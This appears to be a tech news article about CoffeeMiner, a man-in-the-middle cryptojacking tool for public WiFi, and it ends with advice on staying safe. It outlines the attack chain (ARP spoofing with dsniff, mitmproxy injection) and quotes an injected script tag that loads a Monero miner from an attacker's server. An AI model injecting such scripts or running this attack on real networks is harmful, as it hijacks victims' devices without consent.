Amid the cryptocurrency frenzy, the cryptos world has woken up to news of a trending crypto-jacking tool called CoffeeMiner. Apparently, it is possible to mine coins anonymously using the CPUs of those with a penchant for free public WiFi and don’t use VPN as one just needs to use this tool.
Lately, interest in cryptocurrencies has been growing owing to the sudden surge in the value of BTC and ETH. Ransomware attacks in 2017, led by WannaCry and Petya/NonPetya was cyberattackers’ way of getting funds. But the emergence of CoffeeMiner will undoubtedly mark another “peak coinjack.”
What Is CoffeeMiner?
The miner is served via an HTTP server as the attackers reroute unsuspecting victims to a server that's under their watch. All these hackers need are as little as 40 seconds of the victim visiting a given website.
What CoffeeMiner Man In The Middle Cryptojacking Does
- Tricks your browser into thinking it is the WiFi’s access point – using dsniff.
- Passes on your traffic, except web requests. It pushes the requests into a MiTM proxy – using mitmproxy.
The line can be something like this: <script src=”http://192.0.2.42:8000/script.js”><script> whereby, 192.0.2.42:8000 is the server running on the computer and is the crypto-mining code. The developer opted for a favorite miner called CoinHive which is capable of mining Monero coins.
According to its developer, public WiFi might now become a source of income for the hacker. The project was released for academic study, but leans upon its most recent discovery on an Argentinian Starbucks Wi-Fi network. The developer also admits the tool works as he also tested it in real-life scenarios.
How To Protect Yourself From CoffeeMiner
Anyone who loves free WiFi can be a victim. The main risk is using an untrusted network since a rogue attacker could be using it to mess with encrypted web traffic. Without HTTP means no confidentiality, identification, and integrity. To be safe, therefore, only use sites that use HTTPS alone, use a VPN if you can’t live without free WiFi and try to watch out!